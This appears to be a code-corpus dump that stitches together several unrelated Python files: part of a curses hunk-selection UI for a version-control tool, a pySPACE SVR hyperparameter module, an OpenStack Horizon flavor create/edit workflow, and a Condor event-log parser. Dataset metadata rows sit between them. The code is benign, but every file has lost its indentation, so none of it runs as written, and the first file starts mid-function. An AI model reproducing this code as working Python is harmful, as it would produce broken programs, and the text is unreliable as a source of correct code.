if fgcolor is None:
fgcolor = -1
if bgcolor is None:
bgcolor = -1
if (fgcolor, bgcolor) in self.colorpairs:
colorpair = self.colorpairs[(fgcolor, bgcolor)]
else:
pairindex = len(self.colorpairs) + 1
curses.init_pair(pairindex, fgcolor, bgcolor)
colorpair = self.colorpairs[(fgcolor, bgcolor)] = curses.color_pair(
pairindex
)
if name is not None:
self.colorpairnames[name] = curses.color_pair(pairindex)
# add attributes if possible
if attrlist is None:
attrlist = []
if colorpair < 256:
# then it is safe to apply all attributes
for textattr in attrlist:
colorpair |= textattr
else:
# just apply a select few (safe?) attributes
for textattrib in (curses.A_UNDERLINE, curses.A_BOLD):
if textattrib in attrlist:
colorpair |= textattrib
return colorpair
def initcolorpair(self, *args, **kwargs):
"same as getcolorpair."
self.getcolorpair(*args, **kwargs)
def helpwindow(self):
"print a help window to the screen. exit after any keypress."
helptext = _(
""" [press any key to return to the patch-display]
crecord allows you to interactively choose among the changes you have made,
and confirm only those changes you select for further processing by the command
you are running (commit/shelve/revert), after confirming the selected
changes, the unselected changes are still present in your working copy, so you
can use crecord multiple times to split large changes into smaller changesets.
the following are valid keystrokes:
[space] : (un-)select item ([~]/[x] = partly/fully applied)
A : (un-)select all items
up/down-arrow [k/j] : go to previous/next unfolded item
pgup/pgdn [K/J] : go to previous/next item of same type
right/left-arrow [l/h] : go to child item / parent item
shift-left-arrow [H] : go to parent header / fold selected header
f : fold / unfold item, hiding/revealing its children
F : fold / unfold parent item and all of its ancestors
ctrl-l : scroll the selected line to the top of the screen
m : edit / resume editing the commit message
e : edit the currently selected hunk
a : toggle amend mode, only with commit -i
c : confirm selected changes
r : review/edit and confirm selected changes
q : quit without confirming (no changes will be made)
? : help (what you're currently reading)"""
)
helpwin = curses.newwin(self.yscreensize, 0, 0, 0)
helplines = helptext.split("\n")
helplines = helplines + [" "] * (
self.yscreensize - self.numstatuslines - len(helplines) - 1
)
try:
for line in helplines:
self.printstring(
helpwin,
pycompat.encodeutf8(line),
pairname="legend",
attrlist=[curses.A_BOLD],
)
except curses.error:
pass
helpwin.refresh()
try:
with self.ui.timeblockedsection("crecord"):
helpwin.getkey()
except curses.error:
pass
def commitMessageWindow(self):
"Create a temporary commit message editing window on the screen."
curses.raw()
curses.def_prog_mode()
curses.endwin()
self.commenttext = self.ui.edit(self.commenttext, self.ui.username())
curses.cbreak()
self.stdscr.refresh()
self.stdscr.keypad(1) # allow arrow-keys to continue to function
def confirmationwindow(self, windowtext):
"display an informational window, then wait for and return a keypress."
confirmwin = curses.newwin(self.yscreensize, 0, 0, 0)
windowtext = pycompat.encodeutf8(windowtext)
try:
lines = windowtext.split(b"\n")
for line in lines:
self.printstring(confirmwin, line, pairname="selected")
except curses.error:
pass
self.stdscr.refresh()
confirmwin.refresh()
try:
with self.ui.timeblockedsection("crecord"):
response = chr(self.stdscr.getch())
except ValueError:
response = None
return response
def reviewcommit(self):
"""ask for 'y' to be pressed to confirm selected. return True if
confirmed."""
confirmtext = _(
"""if you answer yes to the following, the your currently chosen patch chunks
will be loaded into an editor. you may modify the patch from the editor, and
save the changes if you wish to change the patch. otherwise, you can just
close the editor without saving to accept the current patch as-is.
note: don't add/remove lines unless you also modify the range information.
failing to follow this rule will result in the commit aborting.
are you sure you want to review/edit and confirm the selected changes [yn]?
"""
)
with self.ui.timeblockedsection("crecord"):
response = self.confirmationwindow(confirmtext)
if response is None:
response = "n"
if response.lower().startswith("y"):
return True
else:
return False
def toggleamend(self, opts, test):
"""Toggle the amend flag.
When the amend flag is set, a commit will modify the most recently
committed changeset, instead of creating a new changeset. Otherwise, a
new changeset will be created (the normal commit behavior).
"""
if opts.get("amend") is None:
opts["amend"] = True
msg = _(
"Amend option is turned on -- committing the currently "
"selected changes will not create a new changeset, but "
"instead update the most recently committed changeset.\n\n"
"Press any key to continue."
)
elif opts.get("amend") is True:
opts["amend"] = None
msg = _(
"Amend option is turned off -- committing the currently "
"selected changes will create a new changeset.\n\n"
"Press any key to continue."
)
if not test:
self.confirmationwindow(msg)
def recenterdisplayedarea(self):
"""
once we scrolled with pg up pg down we can be pointing outside of the
display zone. we print the patch with towin=False to compute the
location of the selected item even though it is outside of the displayed
zone and then update the scroll.
"""
self.printitem(towin=False)
self.updatescroll()
def toggleedit(self, item=None, test=False):
"""
edit the currently selected chunk
"""
def updateui(self):
self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
self.updatescroll()
self.stdscr.refresh()
self.statuswin.refresh()
self.stdscr.keypad(1)
def editpatchwitheditor(self, chunk):
if chunk is None:
self.ui.write(_("cannot edit patch for whole file"))
self.ui.write("\n")
return None
if chunk.header.binary():
self.ui.write(_("cannot edit patch for binary file"))
self.ui.write("\n")
return None
# write the initial patch
patch = stringio()
patch.write(pycompat.encodeutf8(diffhelptext + hunkhelptext))
chunk.header.write(patch)
chunk.write(patch)
# start the editor and wait for it to complete
try:
patch = pycompat.encodeutf8(
self.ui.edit(
pycompat.decodeutf8(patch.getvalue()), "", action="diff"
)
)
except error.Abort as exc:
self.errorstr = str(exc)
return None
# remove comment lines
patch = [
line + b"\n" for line in patch.splitlines() if not line.startswith(b"#")
]
return patchmod.parsepatch(patch)
if item is None:
item = self.currentselecteditem
if isinstance(item, uiheader):
return
if isinstance(item, uihunkline):
item = item.parentitem()
if not isinstance(item, uihunk):
return
# To go back to that hunk or its replacement at the end of the edit
itemindex = item.parentitem().hunks.index(item)
beforeadded, beforeremoved = item.added, item.removed
newpatches = editpatchwitheditor(self, item)
if newpatches is None:
if not test:
updateui(self)
return
header = item.header
editedhunkindex = header.hunks.index(item)
hunksbefore = header.hunks[:editedhunkindex]
hunksafter = header.hunks[editedhunkindex + 1 :]
newpatchheader = newpatches[0]
newhunks = [uihunk(h, header) for h in newpatchheader.hunks]
newadded = sum([h.added for h in newhunks])
newremoved = sum([h.removed for h in newhunks])
offset = (newadded - beforeadded) - (newremoved - beforeremoved)
for h in hunksafter:
h.toline += offset
for h in newhunks:
h.folded = False
header.hunks = hunksbefore + newhunks + hunksafter
if self.emptypatch():
header.hunks = hunksbefore + [item] + hunksafter
self.currentselecteditem = header
if len(header.hunks) > itemindex:
self.currentselecteditem = header.hunks[itemindex]
if not test:
updateui(self)
def emptypatch(self):
item = self.headerlist
if not item:
return True
for header in item:
if header.hunks:
return False
return True
def handlekeypressed(self, keypressed, test=False):
"""
Perform actions based on pressed keys.
Return true to exit the main loop.
"""
if keypressed in ["k", "KEY_UP", "KEY_A2"]:
self.uparrowevent()
elif keypressed in ["K", "KEY_PPAGE", "KEY_A3"]:
self.uparrowshiftevent()
elif keypressed in ["j", "KEY_DOWN", "KEY_C2"]:
self.downarrowevent()
elif keypressed in ["J", "KEY_NPAGE", "KEY_C3"]:
self.downarrowshiftevent()
elif keypressed in ["l", "KEY_RIGHT", "KEY_B3"]:
self.rightarrowevent()
elif keypressed in ["h", "KEY_LEFT", "KEY_B1"]:
self.leftarrowevent()
elif keypressed in ["H", "KEY_SLEFT"]:
self.leftarrowshiftevent()
elif keypressed in ["q"]:
raise error.Abort(_("user quit"))
elif keypressed in ["a"]:
self.toggleamend(self.opts, test)
elif keypressed in ["c"]:
return True
elif test and keypressed in ["X"]:
return True
elif keypressed in ["r"]:
if self.reviewcommit():
self.opts["review"] = True
return True
elif test and keypressed in ["R"]:
self.opts["review"] = True
return True
elif keypressed in [" "] or (test and keypressed in ["TOGGLE"]):
self.toggleapply()
if self.ui.configbool("experimental", "spacemovesdown"):
self.downarrowevent()
elif keypressed in ["A"]:
self.toggleall()
elif keypressed in ["e"]:
self.toggleedit(test=test)
elif keypressed in ["f"]:
self.togglefolded()
elif keypressed in ["F"]:
self.togglefolded(foldparent=True)
elif keypressed in ["m"]:
self.commitMessageWindow()
elif keypressed in ["?"]:
self.helpwindow()
self.stdscr.clear()
self.stdscr.refresh()
else:
try:
if len(keypressed) == 1 and curses.unctrl(keypressed) in [b"^L"]:
# scroll the current line to the top of the screen
self.scrolllines(self.selecteditemstartline)
except OverflowError:
# curses sometimes throws a "OverflowError: byte doesn't fit in
# chtype" error.
pass
def main(self, stdscr):
"""
method to be wrapped by curses.wrapper() for selecting chunks.
"""
origsigwinch = sentinel = object()
if util.safehasattr(signal, "SIGWINCH"):
origsigwinch = util.signal(signal.SIGWINCH, self.sigwinchhandler)
try:
return self._main(stdscr)
finally:
if origsigwinch is not sentinel:
util.signal(signal.SIGWINCH, origsigwinch)
def _main(self, stdscr):
self.stdscr = stdscr
# error during initialization, cannot be printed in the curses
# interface, it should be printed by the calling code
self.initerr = None
self.yscreensize, self.xscreensize = self.stdscr.getmaxyx()
curses.start_color()
curses.use_default_colors()
# available colors: black, blue, cyan, green, magenta, white, yellow
# init_pair(color_id, foreground_color, background_color)
self.initcolorpair(None, None, name="normal")
self.initcolorpair(curses.COLOR_WHITE, curses.COLOR_MAGENTA, name="selected")
self.initcolorpair(curses.COLOR_RED, None, name="deletion")
self.initcolorpair(curses.COLOR_GREEN, None, name="addition")
self.initcolorpair(curses.COLOR_WHITE, curses.COLOR_BLUE, name="legend")
self.initcolorpair(curses.COLOR_MAGENTA, None, name="hunk")
# newwin([height, width,] begin_y, begin_x)
self.statuswin = curses.newwin(self.numstatuslines, 0, 0, 0)
self.statuswin.keypad(1) # interpret arrow-key, etc. esc sequences
# figure out how much space to allocate for the chunk-pad which is
# used for displaying the patch
# stupid hack to prevent getnumlinesdisplayed from failing
self.chunkpad = curses.newpad(1, self.xscreensize)
# add 1 so to account for last line text reaching end of line
self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
try:
self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
except curses.error:
self.initerr = _("this diff is too large to be displayed")
return
# initialize selecteditemendline (initial start-line is 0)
self.selecteditemendline = self.getnumlinesdisplayed(
self.currentselecteditem, recursechildren=False
)
while True:
self.updatescreen()
try:
with self.ui.timeblockedsection("crecord"):
keypressed = self.statuswin.getkey()
if self.errorstr is not None:
self.errorstr = None
continue
except curses.error:
keypressed = "foobar"
if self.handlekeypressed(keypressed):
break
if self.commenttext != "":
whitespaceremoved = re.sub("(?m)^\s.*(\n|$)", "", self.commenttext)
if whitespaceremoved != "":
self.opts["message"] = self.commenttext
| gpl-2.0 | 1,711,821,608,135,230,500 | 35.707609 | 89 | 0.588271 | false |
MMKrell/pyspace | pySPACE/missions/nodes/regression/scikit_decorators.py | 2 | 2653 | """ Scikit decorators for optimizing hyperparameters """
from pySPACE.missions.nodes import DEFAULT_NODE_MAPPING, NODE_MAPPING
# noinspection PyUnresolvedReferences
from pySPACE.missions.nodes.scikit_nodes import SVRRegressorSklearnNode
from pySPACE.missions.nodes.decorators import LogUniformParameter, LogNormalParameter,\
ChoiceParameter, QLogUniformParameter, NoOptimizationParameter
from pySPACE.missions.nodes import scikit_nodes
@LogUniformParameter("C", min_value=1e-6, max_value=1e6)
@LogNormalParameter("epsilon", shape=0.1 / 2, scale=0.1)
@ChoiceParameter("kernel",choices=["linear", "rbf", "poly", "sigmoid", "precomputed"])
#degree int, default: 3
@LogUniformParameter("gamma", min_value=1e-6, max_value=1e3)
# coef0: float, default: 0.0
@NoOptimizationParameter("shrinking")
#tol: float, default: 1e-3
@NoOptimizationParameter("cache_size")
@NoOptimizationParameter("verbose")
@QLogUniformParameter("max_iter", min_value=1, max_value=1e6, q=1)
class OptSVRRegressorSklearnNode(SVRRegressorSklearnNode):
__doc__ = "Decorator wrapper around %s \n\n %s" % \
(SVRRegressorSklearnNode.__name__, SVRRegressorSklearnNode.__doc__)
def __init__(self, C=1, epsilon=0.1, kernel="rbf", degree=3, gamma="auto", coef0=0.0, shrinking=True, tol=1e-3,
verbose=False, max_iter=-1, **kwargs):
super(OptSVRRegressorSklearnNode, self).__init__(C=C, epsilon=epsilon, kernel=kernel, degree=int(degree),
gamma=gamma, coef0=coef0, shrinking=shrinking, tol=tol,
verbose=verbose, max_iter=int(max_iter),
**kwargs)
try:
from svext import SVR as IncSVR
inc_svr = scikit_nodes.wrap_scikit_predictor(IncSVR)
class OptIncSVRRegressorSklearnNode(inc_svr):
def __init__(self, C=1, epsilon=0.1, kernel="rbf", degree=3, gamma="auto", coef0=0.0, shrinking=True, tol=1e-3,
verbose=False, max_iter=-1, **kwargs):
super(OptIncSVRRegressorSklearnNode, self).__init__(C=C, epsilon=epsilon, kernel=kernel, degree=int(degree),
gamma=gamma, coef0=coef0, shrinking=shrinking, tol=tol,
verbose=verbose, max_iter=int(max_iter),
**kwargs)
DEFAULT_NODE_MAPPING[inc_svr.__name__] = inc_svr
NODE_MAPPING[inc_svr.__name__] = inc_svr
NODE_MAPPING[inc_svr.__name__[:-4]] = inc_svr
except ImportError:
pass
| gpl-3.0 | -498,357,951,437,703,100 | 51.019608 | 120 | 0.620053 | false |
Daniex/horizon | openstack_dashboard/dashboards/admin/flavors/workflows.py | 43 | 12939 | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import workflows
from openstack_dashboard import api
class CreateFlavorInfoAction(workflows.Action):
_flavor_id_regex = (r'^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-'
r'[0-9a-fA-F]{4}-[0-9a-fA-F]{12}|[0-9]+|auto$')
_flavor_id_help_text = _("Flavor ID should be UUID4 or integer. "
"Leave this field blank or use 'auto' to set "
"a random UUID4.")
name = forms.RegexField(
label=_("Name"),
max_length=255,
regex=r'^[\w\.\- ]+$',
error_messages={'invalid': _('Name may only contain letters, numbers, '
'underscores, periods and hyphens.')})
flavor_id = forms.RegexField(label=_("ID"),
regex=_flavor_id_regex,
required=False,
initial='auto',
help_text=_flavor_id_help_text)
vcpus = forms.IntegerField(label=_("VCPUs"),
min_value=1)
memory_mb = forms.IntegerField(label=_("RAM (MB)"),
min_value=1)
disk_gb = forms.IntegerField(label=_("Root Disk (GB)"),
min_value=0)
eph_gb = forms.IntegerField(label=_("Ephemeral Disk (GB)"),
min_value=0)
swap_mb = forms.IntegerField(label=_("Swap Disk (MB)"),
min_value=0)
class Meta(object):
name = _("Flavor Information")
help_text = _("Flavors define the sizes for RAM, disk, number of "
"cores, and other resources and can be selected when "
"users deploy instances.")
def clean(self):
cleaned_data = super(CreateFlavorInfoAction, self).clean()
name = cleaned_data.get('name')
flavor_id = cleaned_data.get('flavor_id')
try:
flavors = api.nova.flavor_list(self.request, None)
except Exception:
flavors = []
msg = _('Unable to get flavor list')
exceptions.check_message(["Connection", "refused"], msg)
raise
if flavors is not None:
for flavor in flavors:
if flavor.name == name:
raise forms.ValidationError(
_('The name "%s" is already used by another flavor.')
% name
)
if flavor.id == flavor_id:
raise forms.ValidationError(
_('The ID "%s" is already used by another flavor.')
% flavor_id
)
return cleaned_data
class CreateFlavorInfo(workflows.Step):
action_class = CreateFlavorInfoAction
contributes = ("flavor_id",
"name",
"vcpus",
"memory_mb",
"disk_gb",
"eph_gb",
"swap_mb")
class UpdateFlavorAccessAction(workflows.MembershipAction):
def __init__(self, request, *args, **kwargs):
super(UpdateFlavorAccessAction, self).__init__(request,
*args,
**kwargs)
err_msg = _('Unable to retrieve flavor access list. '
'Please try again later.')
context = args[0]
default_role_field_name = self.get_default_role_field_name()
self.fields[default_role_field_name] = forms.CharField(required=False)
self.fields[default_role_field_name].initial = 'member'
field_name = self.get_member_field_name('member')
self.fields[field_name] = forms.MultipleChoiceField(required=False)
# Get list of available projects.
all_projects = []
try:
all_projects, has_more = api.keystone.tenant_list(request)
except Exception:
exceptions.handle(request, err_msg)
projects_list = [(project.id, project.name)
for project in all_projects]
self.fields[field_name].choices = projects_list
# If we have a POST from the CreateFlavor workflow, the flavor id
# isn't an existing flavor. For the UpdateFlavor case, we don't care
# about the access list for the current flavor anymore as we're about
# to replace it.
if request.method == 'POST':
return
# Get list of flavor projects if the flavor is not public.
flavor_id = context.get('flavor_id')
flavor_access = []
try:
if flavor_id:
flavor = api.nova.flavor_get(request, flavor_id)
if not flavor.is_public:
flavor_access = [project.tenant_id for project in
api.nova.flavor_access_list(request,
flavor_id)]
except Exception:
exceptions.handle(request, err_msg)
self.fields[field_name].initial = flavor_access
class Meta(object):
name = _("Flavor Access")
slug = "update_flavor_access"
class UpdateFlavorAccess(workflows.UpdateMembersStep):
action_class = UpdateFlavorAccessAction
help_text = _("Select the projects where the flavors will be used. If no "
"projects are selected, then the flavor will be available "
"in all projects.")
available_list_title = _("All Projects")
members_list_title = _("Selected Projects")
no_available_text = _("No projects found.")
no_members_text = _("No projects selected. "
"All projects can use the flavor.")
show_roles = False
depends_on = ("flavor_id",)
contributes = ("flavor_access",)
def contribute(self, data, context):
if data:
member_field_name = self.get_member_field_name('member')
context['flavor_access'] = data.get(member_field_name, [])
return context
class CreateFlavor(workflows.Workflow):
slug = "create_flavor"
name = _("Create Flavor")
finalize_button_name = _("Create Flavor")
success_message = _('Created new flavor "%s".')
failure_message = _('Unable to create flavor "%s".')
success_url = "horizon:admin:flavors:index"
default_steps = (CreateFlavorInfo,
UpdateFlavorAccess)
def format_status_message(self, message):
return message % self.context['name']
def handle(self, request, data):
flavor_id = data.get('flavor_id') or 'auto'
flavor_access = data['flavor_access']
is_public = not flavor_access
# Create the flavor
try:
self.object = api.nova.flavor_create(request,
name=data['name'],
memory=data['memory_mb'],
vcpu=data['vcpus'],
disk=data['disk_gb'],
ephemeral=data['eph_gb'],
swap=data['swap_mb'],
flavorid=flavor_id,
is_public=is_public)
except Exception:
exceptions.handle(request, _('Unable to create flavor.'))
return False
# Update flavor access if the new flavor is not public
flavor_id = self.object.id
for project in flavor_access:
try:
api.nova.add_tenant_to_flavor(
request, flavor_id, project)
except Exception:
exceptions.handle(
request,
_('Unable to set flavor access for project %s.') % project)
return True
class UpdateFlavorInfoAction(CreateFlavorInfoAction):
flavor_id = forms.CharField(widget=forms.widgets.HiddenInput)
class Meta(object):
name = _("Flavor Information")
slug = 'update_info'
help_text = _("Edit the flavor details. Flavors define the sizes for "
"RAM, disk, number of cores, and other resources. "
"Flavors are selected when users deploy instances.")
def clean(self):
name = self.cleaned_data.get('name')
flavor_id = self.cleaned_data.get('flavor_id')
try:
flavors = api.nova.flavor_list(self.request, None)
except Exception:
flavors = []
msg = _('Unable to get flavor list')
exceptions.check_message(["Connection", "refused"], msg)
raise
# Check if there is no flavor with the same name
if flavors is not None:
for flavor in flavors:
if flavor.name == name and flavor.id != flavor_id:
raise forms.ValidationError(
_('The name "%s" is already used by another '
'flavor.') % name)
return self.cleaned_data
class UpdateFlavorInfo(workflows.Step):
action_class = UpdateFlavorInfoAction
depends_on = ("flavor_id",)
contributes = ("name",
"vcpus",
"memory_mb",
"disk_gb",
"eph_gb",
"swap_mb")
class UpdateFlavor(workflows.Workflow):
slug = "update_flavor"
name = _("Edit Flavor")
finalize_button_name = _("Save")
success_message = _('Modified flavor "%s".')
failure_message = _('Unable to modify flavor "%s".')
success_url = "horizon:admin:flavors:index"
default_steps = (UpdateFlavorInfo,
UpdateFlavorAccess)
def format_status_message(self, message):
return message % self.context['name']
def handle(self, request, data):
flavor_projects = data["flavor_access"]
is_public = not flavor_projects
# Update flavor information
try:
flavor_id = data['flavor_id']
# Grab any existing extra specs, because flavor edit is currently
# implemented as a delete followed by a create.
extras_dict = api.nova.flavor_get_extras(self.request,
flavor_id,
raw=True)
# Mark the existing flavor as deleted.
api.nova.flavor_delete(request, flavor_id)
# Then create a new flavor with the same name but a new ID.
# This is in the same try/except block as the delete call
# because if the delete fails the API will error out because
# active flavors can't have the same name.
flavor = api.nova.flavor_create(request,
data['name'],
data['memory_mb'],
data['vcpus'],
data['disk_gb'],
ephemeral=data['eph_gb'],
swap=data['swap_mb'],
is_public=is_public)
if (extras_dict):
api.nova.flavor_extra_set(request, flavor.id, extras_dict)
except Exception:
exceptions.handle(request, ignore=True)
return False
# Add flavor access if the flavor is not public.
for project in flavor_projects:
try:
api.nova.add_tenant_to_flavor(request, flavor.id, project)
except Exception:
exceptions.handle(request, _('Modified flavor information, '
'but unable to modify flavor '
'access.'))
return True
| apache-2.0 | -4,819,797,779,899,520,000 | 39.946203 | 79 | 0.524152 | false |
bbockelm/condor-network-accounting | src/condor_utils/condor_log_reader.py | 10 | 24479 | #! /usr/bin/env python
##**************************************************************
##
## Copyright (C) 1990-2008, Condor Team, Computer Sciences Department,
## University of Wisconsin-Madison, WI.
##
## Licensed under the Apache License, Version 2.0 (the "License"); you
## may not use this file except in compliance with the License. You may
## obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
##**************************************************************
import re
import os
import sys
import time
# Static global data( yeah, yuck)
class EventPatterns( object ):
def __init__( self ) :
self.__re_hdr = re.compile( '(\d{3}) \((\d+)\.(\d+)\.(\d+)\) ' +
'(\d+/\d+ \d+:\d+:\d+) (.*)' )
def IsSeparatorLine( self, line ) :
return line == "..."
def HasSeparator( self, line ) :
return line.find( "..." ) >= 0
def IsHeaderLine( self, line ) :
m = self.__re_hdr.match( line )
return m is not None
def LineHasHeader( self, line ) :
m = self.__re_hdr.search( line )
return m is not None
def FindHeaderInLine( self, line, match = True ) :
m = None
if match :
m = self.__re_hdr.match( line )
else :
m = self.__re_hdr.search( line )
if m is None :
return None
return m
_patterns = EventPatterns( )
# Event header class
class EventHeader( object ) :
def __init__( self, event_num, cluster, proc, subproc, time, text):
self.__event_num = event_num
self.__cluster = cluster
self.__proc = proc
self.__subproc = subproc
self.__time = time
self.__text = text
self.__line = None
self.__line_num = None
self.__file_name = None
def EventNum( self ) :
return self.__event_num
def IsEvent( self, event_num ) :
return event_num == self.__event_num
def Cluster( self ) :
return self.__cluster
def Proc( self ) :
return self.__proc
def SubProc( self ) :
return self.__subproc
def JobId( self ) :
return "%d.%d.%d" % ( self.__cluster, self.__proc, self.__subproc )
def Time( self ) :
return self.__time
def Text( self ) :
return self.__text
def SetLineInfo( self, filename, line_num, line ) :
self.__file_name = filename
self.__line_num = line_num
self.__line = line
def LineText( self ) :
return self.__line
def LineNum( self ) :
return self.__line_num
def SetLineNum( self, num ) :
return self.__line_num
def FileName( self ) :
return self.__file_name
class EventMisMatchException( Exception ) :
pass
class EventVerifyException( Exception ) :
pass
# Event verification class
class EventVerifier( object ) :
# Event verifier patterns class
class Pattern( object ) :
def __init__( self, lnum, string, where = 0, pos = 0, expect = True ) :
self.__lnum = lnum # Line #
self.__string = string # String to search for
self.__where = where # -1=endswith,0=find,1=startswith
self.__pos = pos # position
self.__expect = expect
def Verify( self, event ) :
line = event.FullText[self.__lnum]
pos = -1
error = False
op = ""
if self.__where < 0 :
pos = line.endswith(self.__string, self.__pos)
op = "endswith"
elif self.__where > 0 :
pos = line.startswith(self.__string, self.__pos)
op = "startswith"
else :
pos = line.find(self.__string, self.__pos)
op = "find"
if self.__expect :
if pos < 0 :
return "line # %d '%s' : '%s' not found @ %d" % \
( self.__lnum, line, self.__string, self.__pos )
else :
if pos >= 0 :
return "line # %d '%s' : '%s' found @ %d" % \
( self.__lnum, line, self.__string, self.__pos )
return None
def __init__( self,
min_body_lines = None,
max_body_lines = None,
patterns = None ) :
self._patterns = patterns
self._min_body_lines = min_body_lines
self._max_body_lines = max_body_lines
def Verify( self, event, level ) :
s = "Event @ line # %d (%s): "%(event.LineNum(0), event.EventNameUc() )
if self._min_body_lines is not None and \
event.NumBodyLines() < self._min_body_lines :
s += "Too few lines (%d < %d)" % \
( event.NumBodyLines(), self._min_body_lines )
raise EventVerifyException( s )
if self._max_body_lines is not None and \
event.NumBodyLines() > self._max_body_lines :
s += "Too many lines (%d < %d)" % \
( event.NumBodyLines(), self._max_body_lines )
raise EventVerifyException( s )
if self._patterns is not None :
for pattern in self._patterns :
ps = pattern.Verify( event )
if ps is not None :
raise EventVerifyException( ps )
if level >= 1 :
for n in range(1, event.NumLines()-1 ) :
line = self.FullText(n)
s = "Event @ line # %d (%s): " % ( event.LineNum(n),
event.EventNameUc() )
if _patterns.HasSeparator( line ) :
raise EventVerifyException( s + " '...' separator found" )
if _patterns.LineHasHeader( line ) :
raise EventVerifyException( s + " header found" )
# Base event information class
class BaseEvent( object ) :
def __init__( self, event_num = None, event_name = None,
real_class = None, other = None ) :
if other is not None :
self._event_num = other.EventNum()
self._event_name = other.EventName()
else :
self._event_num = event_num
self._event_name = event_name
self._real_class = real_class
def EventNum( self ) :
return self._event_num
def EventName( self ) :
return self._event_name
def EventNameUc( self ) :
return self._event_name.upper()
def HeaderNumCheck( self, header ) :
return header.IsEvent( self.EventNum() )
def SetVerifier( self, verifier = None ) :
self._verifier = verifier
def GenRealEvent( self, header ) :
assert self._real_class is not None
return self._real_class( self, header )
# Base 'real' event class
class BaseRealEvent( BaseEvent ) :
def __init__(self, info, header ) :
BaseEvent.__init__( self, other = info )
self._header = header
self._lines = []
if not header.IsEvent( self._event_num ) :
raise EventMisMatchException
self._lines.append( header.LineText() )
self._verifier = None
def NumLines( self ) :
return len(self._lines)
# Lines excluding header and separator
def NumBodyLines( self ) :
return len(self._lines) - 2
def LineNum( self, num = 0 ) :
return self._header.LineNum() + num
def FullText( self, line_num = None ) :
if line_num is not None :
return self._lines[line_num]
else :
return self._lines
def GetHostFromText( self, text ) :
m = re.search( '(<\d+\.\d+\.\d+\.\d+:\d+>)', text )
if m is not None :
return m.group(1)
else :
return None
def GetHostFromHeader( self ) :
assert self._header
return self.GetHostFromText( self._header.Text() )
def GetHeader( self ) :
return self._header
# By default, keep reading 'til we get a "..."
def ProcessEventLine( self, line ) :
self._lines.append( line )
return _patterns.IsSeparatorLine( line )
def Verify( self, level = 0 ):
if self._verifier is not None :
return self._verifier.Verify( self, level )
return None
def Print( self, full = False ) :
print "Event %s (%d) @ line %d (%d body lines)%s" % \
( self.EventNameUc(), self.EventNum(),
self.LineNum(), self.NumBodyLines(),
(":" if full else "") )
if full :
for l in self._lines :
print l
# Job submitted ULOG_SUBMIT = 0
class SubmitEvent( BaseEvent ) :
class RealEvent( BaseRealEvent ) :
def __init__( self, base, header ) :
BaseRealEvent.__init__( self, base, header )
self._host = self.GetHostFromHeader()
def __init__( self ) :
BaseEvent.__init__( self, 0, "submit", self.RealEvent )
patterns = ( EventVerifier.Pattern(0, "Job submitted", 1), )
self.SetVerifier( EventVerifier( patterns, 0, None ) )
def EventNum( self ) :
return 0
# Job now running ULOG_EXECUTE = 1
class ExecuteEvent( BaseEvent ) :
class RealEvent( BaseRealEvent ) :
def __init__( self, base, header ) :
BaseRealEvent.__init__( self, base, header )
self._host = self.GetHostFromHeader()
def __init__( self ) :
BaseEvent.__init__( self, 1, "execute", self.RealEvent )
patterns = (EventVerifier.Pattern( 0, "Job executing", 1), )
self.SetVerifier( EventVerifier( patterns, 0, 0 ) )
def EventNum( self ) :
return 1
# Error in executable ULOG_EXECUTABLE_ERROR = 2
class ExecutableErrorEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 2, "executable error", BaseRealEvent )
def EventNum( self ) :
return 2
# Job was checkpointed ULOG_CHECKPOINTED = 3
class CheckpointEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 3, "checkpointed", BaseRealEvent )
def EventNum( self ) :
return 3
# Job evicted from machine ULOG_JOB_EVICTED = 4
class JobEvictedEvent( BaseEvent ) :
class RealEvent( BaseRealEvent ) :
def __init__( self, base, header ) :
BaseRealEvent.__init__( self, base, header )
def __init__( self ) :
BaseEvent.__init__( self, 4, "evicted", self.RealEvent )
patterns = ( EventVerifier.Pattern(0, "evicted.", -1),
EventVerifier.Pattern(1, "checkpointed.", -1),
EventVerifier.Pattern(2, "Remote Usage", -1),
EventVerifier.Pattern(3, "Local Usage", -1),
EventVerifier.Pattern(4, "Sent By Job", -1),
EventVerifier.Pattern(5, "Received By Job", -1),
)
self.SetVerifier( EventVerifier( patterns, 5, 5 ) )
def EventNum( self ) :
return 4
# Job terminated ULOG_JOB_TERMINATED = 5
class JobTerminateEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 5, "terminated", BaseRealEvent )
def EventNum( self ) :
return 5
# Image size of job updated ULOG_IMAGE_SIZE = 6
class ImageSizeEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 6, "image size", BaseRealEvent )
def EventNum( self ) :
return 6
# Shadow threw an exception ULOG_SHADOW_EXCEPTION = 7
class ShadowExceptionEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 7, "shadow exception", BaseRealEvent )
def EventNum( self ) :
return 7
# Generic Log Event ULOG_GENERIC = 8
class GenericEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 8, "generic", BaseEvent )
def EventNum( self ) :
return 8
# Job Aborted ULOG_JOB_ABORTED = 9
class JobAbortedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 9, "job aborted", BaseRealEvent )
patterns = ( EventVerifier.Pattern(0, "Job was aborted", 1), )
